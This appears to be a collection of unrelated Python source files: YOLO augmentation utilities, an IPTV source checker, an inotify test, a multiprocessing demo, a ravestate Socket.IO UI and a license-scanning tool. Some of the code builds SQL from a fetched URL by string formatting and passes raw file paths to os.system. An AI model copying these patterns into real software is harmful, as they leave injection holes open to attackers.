img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
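# Hedged usage sketch (not part of the original file): shows what letterbox() returns for a
# hypothetical 720x1280 BGR frame. The shapes and names below are illustrative assumptions only.
def _letterbox_demo():
    im = np.zeros((720, 1280, 3), dtype=np.uint8)  # dummy HxWxC frame
    out, ratio, (dw, dh) = letterbox(im, new_shape=640, auto=True)
    # ratio is the (width, height) scale factor applied before padding; (dw, dh) is the padding
    # added on each side (for this input the output is 384x640)
    return out.shape, ratio, (dw, dh)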
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
dotpy.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tools
import time
import re
import db
import threading
class Source (object) :
def __init__ (self):
self.T = tools.Tools()
self.now = int(time.time() * 1000)
def getSource (self) :
sourcePath = './plugins/dotpy_source'
with open(sourcePath, 'r') as f:
lines = f.readlines()
total = len(lines)
threads = []
for i in range(0, total):
line = lines[i].strip('\n')
item = line.split(',', 1)
thread = threading.Thread(target = self.detectData, args = (item[0], item[1], ), daemon = True)
thread.start()
threads.append(thread)
for t in threads:
t.join()
def detectData (self, title, url) :
info = self.T.fmtTitle(title)
netstat = self.T.chkPlayable(url)
if netstat > 0 :
cros = 1 if self.T.chkCros(url) else 0
data = {
'title' : str(info['id']) if info['id'] != '' else str(info['title']),
'url' : str(url),
'quality': str(info['quality']),
'delay' : netstat,
'level' : info['level'],
'cros' : cros,
'online' : 1,
'udTime' : self.now,
}
self.addData(data)
print('Checking[ %s ]: %s' % (str(info['id']) + str(info['title']), url))
else :
pass # MAYBE later :P
def addData (self, data) :
DB = db.DataBase()
sql = "SELECT * FROM %s WHERE url = '%s'" % (DB.table, data['url'])
result = DB.query(sql)
if len(result) == 0 :
data['enable'] = 1
DB.insert(data)
else :
id = result[0][0]
DB.edit(id, data)
|
pollinotify_test.py
|
'''
Created on 30 Jun 2014
@author: julianporter
'''
import random
import unittest
import multiprocessing
import collections
import tempfile
import time
import os
import sys
from .actions import EventGenerator, EventObserver
class TestInotify(unittest.TestCase):
def __init__(self,methodName='runTest',nTests=10):
super(TestInotify,self).__init__(methodName)
self.nTests=nTests
def setUp(self):
self.duration=random.randint(2,10)
self.path=os.path.join(tempfile.gettempdir(),'inotify')
try:
os.mkdir(self.path)
except OSError:
pass  # the directory may already exist
srcE, self.dstE = multiprocessing.Pipe()
srcO, self.dstO = multiprocessing.Pipe()
observerBarrier=multiprocessing.Semaphore()
sourceBarrier=multiprocessing.Semaphore()
self.observer=EventObserver(observerBarrier,sourceBarrier,srcO,path=self.path)
self.source=EventGenerator(observerBarrier,sourceBarrier,srcE,self.duration,path=self.path)
self.source.init()
self.observer.init()
self.observerTask=multiprocessing.Process(target=self.observer)
self.sourceTask=multiprocessing.Process(target=self.source)
self.observerTask.start()
self.sourceTask.start()
self.wait()
self.events=collections.defaultdict(lambda : 0)
self.events.update(self.dstE.recv())
self.observations=collections.defaultdict(lambda : 0)
self.observations.update(self.dstO.recv())
self.dstE.close()
self.dstO.close()
def tearDown(self):
self.observer.shutdown()
self.source.shutdown()
def wait(self):
for _ in range(self.duration):
print('.', end='')
sys.stdout.flush()
time.sleep(1)
def test_Create(self):
self.assertEqual(self.observations['Create'],self.events['WRITE'])
def test_Read(self):
self.assertEqual(self.observations['CloseOther'],self.events['READ'])
def test_Write(self):
self.assertEqual(self.observations['CloseWrite'],self.events['WRITE']+self.events['TOUCH']+self.events['MODIFY'])
def test_Change(self):
self.assertEqual(self.observations['Modify'],self.events['WRITE']+self.events['MODIFY'])
def test_Delete(self):
self.assertEqual(self.observations['Delete'], self.events['DELETE'])
def test_Move(self):
self.assertEqual(self.observations['MoveFrom'],self.events['MOVE'])
self.assertEqual(self.observations['MoveTo'],self.events['MOVE'])
def test_Open(self):
self.assertEqual(self.observations['Open'],self.events['READ']+self.events['WRITE']+self.events['TOUCH']+self.events['MODIFY'])
def teardown_module():
pass
if __name__=='__main__':
unittest.main(exit=False)
|
Sample_MultiProcess.py
|
import multiprocessing as mp
from multiprocessing import Process, Pipe
import time
class InputDataClass:
input_data_1 = 0
input_data_2 = 0
def __init__(self, in1, in2):
self.input_data_1 = in1
self.input_data_2 = in2
class OutputDataClass:
output_data_1 = 0
output_data_2 = 0
def print(self):
print("output_data_1: " + str(self.output_data_1) + ", output_data_2:" + str(self.output_data_2))
class ProcessClass:
@staticmethod
def process(conn, input_data):
output = OutputDataClass()
output.output_data_1 = input_data.input_data_1
output.output_data_2 = input_data.input_data_2 ** 2
# time.sleep(output.output_data_1)  # uncomment to simulate slow subprocesses and watch the polling loop below
# send the output
conn.send(output)
# close
conn.close()
def main():
n_process = 10 # mp.cpu_count() - 1 #
list_conn_out = []
list_process = []
for i in range(n_process):
# Create input data
input_data = InputDataClass(i, i)
# Create a one-way pipe per subprocess: Pipe(False) returns (receive-only, send-only) connection ends
conn_out, conn_in = Pipe(False)
# Subprocess: The conn_in is given to send the output data from subprocess.
p = Process(target=ProcessClass.process, args=(conn_in, input_data))
p.start()
# The parent doesn't use conn_in; closing its copy here leaves the child as the only holder of the send end, so recv() can detect EOF if the child exits early.
conn_in.close()
# Append the process in order to join later
list_process.append(p)
# Append the connection for output
list_conn_out.append(conn_out)
# Wait for all output data, checking readiness every *duration* seconds.
time_out = 0.01
duration = 1.0
while 1:
n_ready = len(mp.connection.wait(list_conn_out, time_out))
print(str(n_ready) + " of " + str(n_process) + " processes finished.")
if n_ready == n_process:
# Subprocesses can join here.
break
time.sleep(duration)
# Receive output data
list_output = []
for i in range(n_process):
# Receive and close
output_data = list_conn_out[i].recv()
list_conn_out[i].close()
# Append the output
list_output.append(output_data)
output_data.print()
if __name__ == "__main__":
main()
|
ui_context.py
|
import ravestate as rs
import ravestate_rawio as rawio
import ravestate_nlp as nlp
import ravestate_phrases_basic_en as lang
import ravestate_verbaliser as verbaliser
from .ui_model import UIActivationModel, UISpikeModel
from .session import SessionClient
from typing import Any, Tuple, List, Union, Dict, Optional, Callable
import socketio
import flask
import urllib.parse
from threading import Thread, Lock, Event
from collections import defaultdict
from reggol import get_logger
logger = get_logger(__name__)
RAVEBOARD = "raveboard"
PORT_CONFIG_KEY = "port"
URL_PREFIX_KEY = "host"
SESSION_DB_KEY = "session_db"
URL_ANNOUNCE_KEY = "announce"
GREETING_KEY = "greet"
SESSION_TIMEOUT_KEY = "timeout"
SSL_CRT_AND_KEY_CONTEXT = "ssl_context"
ANNOUNCE_URL_YES = "yes"
GREET_ON_CONNECT = "connect"
RAVEBOARD_CONFIG = {
PORT_CONFIG_KEY: 42424,
URL_PREFIX_KEY: "http://localhost",
SESSION_DB_KEY: "",
URL_ANNOUNCE_KEY: ANNOUNCE_URL_YES,
GREETING_KEY: "",
SESSION_TIMEOUT_KEY: 40,
SSL_CRT_AND_KEY_CONTEXT: []
}
class UIContext(rs.Context):
def __init__(self, *arguments, runtime_overrides: List[Tuple[str, str, Any]] = None, skip_http_serve=False):
self.msgs_lock = Lock()
self.sio = socketio.Server(cors_allowed_origins="*", async_mode="threading")
self.next_id_for_object = defaultdict(int)
self.ui_objects: Dict[Union[rs.Spike, rs.Activation], Union[UISpikeModel, UIActivationModel]] = dict()
self.sio.on("connect", self._authorize_client)
self.session_client: Optional[SessionClient] = None
self.config_parsed = Event()
self.new_connection: Callable = lambda: None
self.new_connection_called: bool = False
super().__init__(*arguments, runtime_overrides=runtime_overrides)
if not skip_http_serve:
Thread(target=self.ui_serve_events_async).start()
def ui_serve_events_async(self):
app = flask.Flask(__name__, static_folder="dist/ravestate")
app.wsgi_app = socketio.Middleware(self.sio, app.wsgi_app)
ssl_context = self.conf(mod=RAVEBOARD, key=SSL_CRT_AND_KEY_CONTEXT)
if not ssl_context or len(ssl_context) != 2:
ssl_context = None
else:
ssl_context = tuple(ssl_context)
app.run(
host='0.0.0.0',
port=self.conf(mod=RAVEBOARD, key=PORT_CONFIG_KEY),
threaded=True,
ssl_context=ssl_context)
def _authorize_client(self, _, msg):
self.config_parsed.wait()
if self.session_client:
query = urllib.parse.parse_qs(msg['QUERY_STRING'])
if not query or 'token' not in query:
return False
token = query['token']
if len(token) < 1:
return False
if not self.session_client.authorized(token[0]):
return False
else:
# Not a managed session, no auth required
pass
if not self.new_connection_called:
self.new_connection()
self.new_connection_called = True
return True
def _load_modules(self, modules: List[str]):
super()._load_modules(modules)
with rs.Module(name=RAVEBOARD, config=RAVEBOARD_CONFIG, depends=(rawio.mod, verbaliser.mod, nlp.mod)) as mod:
sig_last_output = rs.Signal(name="last-output")
sig_heartbeat = rs.Signal(name="heartbeat")
prop_connections = rs.Property(name="connections")
@rs.state(cond=rs.sig_startup.detached().min_age(1.), write=rawio.prop_out)
def startup(ctx):
session_db_path = ctx.conf(mod=RAVEBOARD, key=SESSION_DB_KEY)
if session_db_path:
self.session_client = SessionClient(db_path=session_db_path, port=ctx.conf(key=PORT_CONFIG_KEY))
self.config_parsed.set()
if ctx.conf(key=URL_ANNOUNCE_KEY) == ANNOUNCE_URL_YES:
sio_uri = urllib.parse.quote(f"{ctx.conf(key=URL_PREFIX_KEY)}:{ctx.conf(key=PORT_CONFIG_KEY)}")
url = f"{ctx.conf(key=URL_PREFIX_KEY)}:{ctx.conf(key=PORT_CONFIG_KEY)}/ravestate/index.html?rs-sio-url={sio_uri}"
logger.info(f"Raveboard URL: {url}")
ctx[rawio.prop_out] = f"Watch your conversation on Raveboard here! {url}"
@rs.state(cond=rs.sig_startup | sig_heartbeat.min_age(1.), signal=sig_heartbeat, emit_detached=True, boring=True)
def heartbeat(ctx):
self.config_parsed.wait()
if self.session_client and not self.session_client.dead():
self.session_client.heartbeat()
return rs.Emit()
@rs.state(read=rawio.prop_out, signal=sig_last_output, emit_detached=True, boring=True)
def emit_output(ctx):
self.sio.emit("output", {"type": "output", "text": ctx[rawio.prop_out.changed()]})
return rs.Emit(wipe=True)
self._add_ravestate_module(mod)
@rs.receptor(ctx_wrap=self, write=(rawio.prop_in,))
def receive_input(ctx, _, new_input_event):
if 'text' not in new_input_event:
logger.error("Bad socket.io message for input event!")
return
ctx[rawio.prop_in] = new_input_event['text']
self.sio.on("input", receive_input)
@rs.receptor(ctx_wrap=self, write=(rawio.prop_in,))
def new_connection(ctx):
if ctx.conf(mod=RAVEBOARD, key=GREETING_KEY) == GREET_ON_CONNECT:
ctx[rawio.prop_in] = "hi"
@rs.state(
cond=sig_last_output.min_age(rs.ConfigurableAge(key=SESSION_TIMEOUT_KEY)).max_age(-1).detached(),
write=verbaliser.prop_intent,
boring=True)
def end_session(ctx):
if self.session_client:
self.session_client.killme()
ctx[verbaliser.prop_intent] = lang.intent_farewells
mod.add(end_session)
ctx.add_state(end_session)
self.new_connection = new_connection
def ui_model(self, spike_or_act: Union[rs.Spike, rs.Activation], parent_spikes=()) -> Union[UIActivationModel, UISpikeModel]:
if spike_or_act in self.ui_objects:
return self.ui_objects[spike_or_act]
else:
new_id = self.next_id_for_object[spike_or_act.__class__]
self.next_id_for_object[spike_or_act.__class__] += 1
new_obj = None
if isinstance(spike_or_act, rs.Spike):
new_obj = UISpikeModel(
id=new_id,
signal=spike_or_act.id(),
parents=tuple(self.ui_model(parent).id for parent in parent_spikes))
elif isinstance(spike_or_act, rs.Activation):
new_obj = UIActivationModel(
id=new_id,
state=spike_or_act.state_to_activate.name,
specificity=1.,
status="wait",
spikes=[])
else:
logger.error(f"Attempt to retrieve UI model for unknown object {spike_or_act}!")
self.ui_objects[spike_or_act] = new_obj
return new_obj
def ui_update_act(self, act: rs.Activation, is_running=False):
# -- do not report on boring activations
if act not in self.ui_objects and not act.spiky(filter_boring=True):
return
act_model = self.ui_model(act)
update_needed = False
# -- determine status transition
if is_running:
act_model.status = "run"
update_needed = True
else:
act_is_ready = act.constraint.evaluate()
if act_is_ready and act_model.status == "wait":
act_model.status = "ready"
update_needed = True
elif not act_is_ready and act_model.status == "ready":
act_model.status = "wait"
update_needed = True
# -- build spike reference structure, while
# determining whether the activation's current one is up-to-date
new_spike_ref_struct = []
fully_unreferenced = True
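# new_spike_ref_struct holds one dict per conjunction, mapping signal name -> referenced spike id
# (-1 when the signal has no spike yet)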
for i, conj in enumerate(act.constraint.conjunctions()):
new_conj_dict = {}
cur_conj_dict = {}
new_spike_ref_struct.append(new_conj_dict)
if len(act_model.spikes) > i:
cur_conj_dict = act_model.spikes[i]
else:
update_needed = True
for sig in conj.signals():
spike_id = -1
if sig.spike:
spike_model = self.ui_model(sig.spike)
spike_id = spike_model.id
if not spike_model.published:
self.sio.emit("spike", vars(spike_model))
spike_model.published = True
fully_unreferenced = False
new_conj_dict[sig.name] = spike_id
if sig.name not in cur_conj_dict or cur_conj_dict[sig.name] != spike_id:
update_needed = True
# -- update spike ref structure, send activation to frontend on-demand
if update_needed:
act_model.spikes = new_spike_ref_struct
self.sio.emit("activation", vars(act_model))
# -- forget activation, if it was run and it is fully unreferenced
if fully_unreferenced and act_model.status == "run":
del self.ui_objects[act]
# --------------------- Context Overrides ---------------------
def emit(self, signal, parents=None, wipe: bool = False, payload=None, boring=False) -> rs.Spike:
new_spike = super().emit(signal, parents, wipe, payload, boring)
# create spike ui model, but only send it on demand when it is referenced by an activation
# exception: the spike is an offspring spike
spike_model = self.ui_model(new_spike, parent_spikes=parents if parents else ())
if parents:
self.sio.emit("spike", vars(spike_model))
spike_model.published = True
return new_spike
def run_once(self, seconds_passed=1., debug=False):
super(UIContext, self).run_once(seconds_passed, debug)
with self._lock:
acts_to_update = (
{act for act in self.ui_objects if isinstance(act, rs.Activation)} |
self._state_activations())
for act in acts_to_update:
self.ui_update_act(act)
def _state_activated(self, act: rs.Activation):
super(UIContext, self)._state_activated(act)
self.ui_update_act(act, is_running=True)
def _spike_discarded(self, spike: rs.Spike):
super(UIContext, self)._spike_discarded(spike)
self.ui_objects.pop(spike)
|
broadcast_listener.py
|
import socket
import threading
class BroadcastListener:
def __init__(self, channel, port):
self._request_channel = channel
self.listener = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)
# Enable to run multiple clients and servers on a single (host,port)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Enable broadcasting mode
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.listener.bind(("", port))
def listen(self):
while True:
# wait for incoming data
data, addr = self.listener.recvfrom(1024)
data = data.decode()
# write data to channel to be consumed by server
self._request_channel.produce((data, addr))
def start(self):
listening_thread = threading.Thread(target=self.listen)
listening_thread.start()
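# Hedged usage sketch (not part of the original module): it assumes a minimal channel object
# exposing produce(); the real request channel lives elsewhere. The port number 37020 is an
# arbitrary example value.
class _PrintChannel:
    def produce(self, item):
        data, addr = item
        print("received %r from %s" % (data, addr))

def _demo(port=37020):
    # A sender elsewhere on the LAN could reach this listener with:
    #   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    #   s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    #   s.sendto(b"hello", ("<broadcast>", port))
    BroadcastListener(_PrintChannel(), port).start()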
|
licenseversion.py
|
#!/usr/bin/python
## Binary Analysis Tool
## Copyright 2011-2016 Armijn Hemel for Tjaldur Software Governance Solutions
## Licensed under Apache 2.0, see LICENSE file for details
import os, os.path, sys, subprocess, copy, cPickle, Queue
import multiprocessing, re, datetime
from multiprocessing import Process, Lock
from multiprocessing.sharedctypes import Value, Array
if sys.version_info[1] == 7:
import collections
have_counter = True
else:
have_counter = False
'''
This file contains the ranking algorithm as described in the paper
"Finding Software License Violations Through Binary Code Clone Detection"
by Armijn Hemel, Karl Trygve Kalleberg, Eelco Dolstra and Rob Vermaas, as
presented at the Mining Software Repositories 2011 conference.
In this scan, results can optionally be pruned. Results of scans can get very
large: for example, a scan of a Linux kernel image could have thousands of
string matches, each of which can be found in a few hundred kernel source code
archives.
By pruning results the amount of noise can be greatly reduced, reports can be
made smaller, and source code checks using the results of BAT can be made more
effective.
To remove a version A from the set of versions, the following conditions have
to hold:
* a minimum number of results is available (20 or 30 seems to be a good cut-off value)
* all strings/variables/function names found in A are also found in the most
promising version
* the number of strings/variables/function names found in A is significantly
smaller than the number in the most promising version (expressed as a maximum
percentage)
Ranking results for Java JAR files are aggregated. Individual class files often
do not contain enough information. By aggregating the results of these classes
it is possible to get a better view of what is inside a JAR.
The parameter AGGREGATE_CLEAN can be set to 1 to indicate that .class files
should be removed from the result set after aggregation. By default these files
are not removed.
'''
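## Illustrative sketch (not part of BAT): the pruning rule described above, reduced to its core
## test. identifiers_a and identifiers_best are sets of matched strings/variables/function names;
## minimum_results and max_percentage are hypothetical cut-off values.
def _would_prune(identifiers_a, identifiers_best, minimum_results=20, max_percentage=10.0):
    if len(identifiers_best) < minimum_results:
        return False
    if not identifiers_a.issubset(identifiers_best):
        return False
    return len(identifiers_a) * 100.0 / len(identifiers_best) <= max_percentage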
## lookup tables for names of string caches and string cache scores
stringsdbperlanguagetable = { 'C': 'stringscache_c'
, 'C#': 'stringscache_csharp'
, 'Java': 'stringscache_java'
, 'JavaScript': 'stringscache_javascript'
, 'PHP': 'stringscache_php'
, 'Python': 'stringscache_python'
, 'Ruby': 'stringscache_ruby'
, 'ActionScript': 'stringscache_actionscript'
}
avgstringsdbperlanguagetable = { 'C': 'avgstringscache_c'
, 'C#': 'avgstringscache_csharp'
, 'Java': 'avgstringscache_java'
, 'JavaScript': 'avgstringscache_javascript'
, 'PHP': 'avgstringscache_php'
, 'Python': 'avgstringscache_python'
, 'Ruby': 'avgstringscache_ruby'
, 'ActionScript': 'avgstringscache_actionscript'
}
## mappings from FOSSology to Ninka and vice versa
ninka_to_fossology = { 'LesserGPLv2+': 'LGPL-2.0+'
, 'BSD3': 'BSD-3-Clause'
, 'boostV1Ref': 'BSL-1.0'
}
fossology_to_ninka = { 'No_license_found': 'NONE'
, 'GPL-1.0': 'GPLv1'
, 'GPL-1.0+': 'GPLv1+'
, 'GPL-2.0': 'GPLv2'
, 'GPL-2.0+': 'GPLv2+'
, 'GPL-3.0': 'GPLv3'
, 'GPL-3.0+': 'GPLv3+'
, 'LGPL-2.0': 'LibraryGPLv2'
, 'LGPL-2.0+': 'LibraryGPLv2+'
, 'LGPL-2.1': 'LesserGPLv2.1'
, 'LGPL-2.1+': 'LesserGPLv2.1+'
, 'LGPL-3.0': 'LesserGPLv3'
, 'LGPL-3.0+': 'LesserGPLv3+'
, 'Apache-1.0': 'Apachev1.0'
, 'Apache-1.1': 'Apachev1.1'
, 'Apache-2.0': 'Apachev2'
, 'BSL-1.0': 'boostV1'
, 'MPL-1.0': 'MPLv1_0'
, 'FTL': 'FreeType'
, 'PHP-3.01': 'phpLicV3.01'
, 'Postfix': 'Postfix'
, 'QPL-1.0': 'QTv1'
, 'MPL-1.1': 'MPLv1_1'
, 'Zend-2.0': 'zendv2'
, 'NPL-1.1': 'NPLv1_1'
, 'BSD-2-Clause': 'spdxBSD2'
, 'BSD-3-Clause': 'spdxBSD3'
, 'EPL-1.0': 'EPLv1'
, 'Artifex': 'artifex'
, 'CDDL': 'CDDLic'
, 'Public-domain': 'publicDomain'
, 'Public-domain-ref': 'publicDomain'
, 'IPL': 'IBMv1'
, 'Intel': 'IntelACPILic'
, 'MX4J-1.0': 'MX4JLicensev1'
, 'Beerware': 'BeerWareVer42'
, 'CPL-1.0': 'CPLv1'
, 'Sun': 'sunRPC'
, 'SunPro': 'SunSimpleLic'
, 'W3C-IP': 'W3CLic'
, 'Artistic-1.0': 'ArtisticLicensev1'
}
reerrorlevel = re.compile("<[\d+cd]>")
reparam = re.compile("([\w_]+)\.([\w_]+)")
rematch = re.compile("\d+")
## The scanners that are used in BAT are Ninka and FOSSology. These scanners
## don't always agree on results, but when they do, it is very reliable.
def squashlicenses(licenses):
## licenses: [(license, scanner)]
if len(licenses) != 2:
return licenses
if licenses[0][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[1][0]):
if fossology_to_ninka[licenses[1][0]] == licenses[0][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
else:
status = "difference"
elif licenses[1][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[0][0]):
if fossology_to_ninka[licenses[0][0]] == licenses[1][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
return licenses
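## Illustrative example (not in the original): when the two scanners agree, e.g.
## squashlicenses([('GPLv2', 'ninka'), ('GPL-2.0', 'fossology')]) returns [('GPLv2', 'squashed')];
## disagreeing or single results are passed through unchanged.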
def aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None):
## find all JAR files. Do this by:
## 1. checking the tags for 'zip'
## 2. verifying for unpacked files that there are .class files
## 3. TODO: possibly verifying there is a META-INF directory with a manifest
sha256stofiles = {}
jarfiles = []
sha256seen = []
alljarfiles = []
for i in unpackreports:
